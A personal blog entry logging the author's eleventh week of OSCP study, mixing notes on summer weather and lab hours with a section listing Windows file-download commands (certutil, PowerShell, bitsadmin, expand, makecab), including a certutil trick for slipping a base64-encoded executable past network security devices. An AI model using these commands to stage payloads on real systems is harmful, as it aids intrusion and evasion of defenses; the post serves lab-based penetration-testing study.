OSCP Week 11

I started with the PWK course to go for my OSCP. This series documents my progress. I hope to give some insight into the brutal proces and examn that goes into obtaining the coveted certificate.

In this post

-  Summer!
-  Some links
-  A guide to downloading files on Windows
-  Progress this week 


Back in the late 90's, early 00's I used to live in San Francisco. One of the things I loved about the place was the fact that it was always reasonable nice weather. Generally you could just walk around in a t-shirt. Since then I moved back to The Netherlands. I love my home country and I think it offers a tremendous quality of life. One thing that is sad about the country however is that the summer is very short. We have lots of rain, wind and a coastal climat that make it relatively cold.

So when we were surprised with a something the weather people call a 'Flash Summer' this week the world stands still. We spent long evenings outside, do bbq and drink with family and friends. The temperature even hit over 30C on thursday. We are not equipped to properly work with these type of temperatures.

So I spent most of the week with the family and spent little time on the study. On friday I started teaching my DFIR course again. This time for fulltime students who have had very little experience in the IT field.


Downloading files

That last post triggered me to collect the various ways you can actually download a file. Within the OSCP labs this is very usefull and your resourcefullness is pushed to an breaking point.

Lets take a look at some of the ways you can actually download a file to a Windows machine. Besides the normal FTP and TFTP ways there are a lot of tools that will transfer file for you.

Using certutil

certutil.exe -urlcache -split -f [URL] output.file

If you base64 encode the download first to bypass network security devices you can also use certutil to decode the file:

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe


A simple download using powershell 3+:

powershell -NoLogo -Command "Invoke-WebRequest -Uri 'https://some.remote.private.location/myfile.ps1' -OutFile 'c:\Windows\Temp\myfile.ps1'"

If the location is protected with HTTP Basic Auth:

powershell -NoLogo -Command "Invoke-WebRequest -Uri 'https://some.remote.private.location/myfile.ps1' -OutFile 'c:\Windows\Temp\myfile.ps1' -UseBasicParsing -Credential (New-Object PSCredential('user123', (ConvertTo-SecureString -AsPlainText -Force -String 'password123')))"

The same for Powershell 2:

powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.Credentials = new-object System.Net.NetworkCredential('user123', 'password123'); $webClient.DownloadFile('https://some.remote.private.location/myfile.ps1', 'c:\Windows\Temp\myfile.ps1')"


Microsoft has a great reference page on how to download remote resources using Bitsadmin. The manual says:

BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.

A simple usage would be:

bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/evil.txt c:\Windows\Temp\evil.txt


A trick learned from Rahmat.

expand \\remote IP\file.txt file.txt


This one came as a response on Rahmat's post, from sysobpf.

makecab.exe \\remote IP\file.txt file.cab


The total time is now 9865 minutes, or 164.4 hours. Up 637 minutes from last week. Which was basically the same as the week before.

I worked on 3 machines this week. Most of the time was spent on a machine that was more of a puzzle adventure then an actual hacking experience. It was quite complex in that it used some techniques I did not use before, so a great learning experience!

Machine Time
Machine 32 [O] 0:30
Machine 33 [O] 6:25
Machine 34 3:42

Below is the weekly graph again, the trend is flattening out. I have 8 workable days left and I intent to use every single one of them for the study.


Next week

The coming week I need to finish my report and work on some Windows Post Exploitation in order to get ready for the exam!